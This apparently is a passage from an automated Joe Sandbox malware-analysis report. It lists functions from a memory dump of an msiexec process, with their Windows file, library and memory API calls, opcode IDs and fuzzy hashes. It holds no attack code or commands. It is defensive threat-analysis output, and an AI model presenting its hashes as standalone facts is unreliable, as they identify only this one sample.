                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                                          • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                          • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                          Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                          • Opcode ID: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                          Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                          • Opcode ID: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                          Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                          • Opcode ID: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                                                                                                                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

